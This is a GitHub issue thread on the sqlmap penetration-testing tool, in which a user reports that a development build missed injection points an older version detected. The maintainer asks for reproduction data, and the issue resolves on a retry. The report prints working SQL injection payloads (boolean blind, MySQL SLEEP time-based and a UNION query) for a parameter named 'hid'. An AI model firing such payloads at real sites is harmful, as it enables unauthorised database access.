### ISSUE TITLE
SQLMAP version 1.3.2.22#dev fails to detect injection

### ISSUE THREAD

**Issue by serptt** [sqlmapproject/sqlmap#3494]
Sqlmap 1.2.10#stable detect following injection points (no false/positive/no tamper script used):

Parameter: hid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: hid=0' AND 9963=9963-- GRzI
    Vector: AND [INFERENCE]

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: hid=0' AND SLEEP(5)-- KqSd
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    Type: UNION query
    Title: Generic UNION query (random number) - 14 columns
    Payload: hid=-4174' UNION ALL SELECT 8367,8367,8367,8367,8367,8367,8367,8367,8367,8367,CONCAT(0x716b717171,0x5a504e46524c4d4f50514f7a6a65674748515a756450576b655670674c6377474a4253476c4b784b,0x717a7a7071),8367,8367,8367-- nDpP
    Vector:  UNION ALL SELECT 5659,5659,5659,5659,5659,5659,5659,5659,5659,5659,[QUERY],5659,5659,5659[GENERIC_SQL_COMMENT]

SQLMAP version 1.3.2.22#dev find none.

P.S: Also how do I use sqlmap 1.2.7 color style?

Thanks

**Comment by stamparm** [comment]
A) How to reproduce this? I am not able to reproduce in testing environment
B) There is no fallback to old color style

**Comment by serptt** [comment]
What do you need exactly?

**Comment by stamparm** [comment]
Anything usable. Put yourself in my position and read the original claim. For example, traffic files for both versions (e.g. `-t traffic.txt --flush-session`)

**Comment by serptt** [comment]
Third time was a success, it managed to detect it!
You can close this now.

Thanks
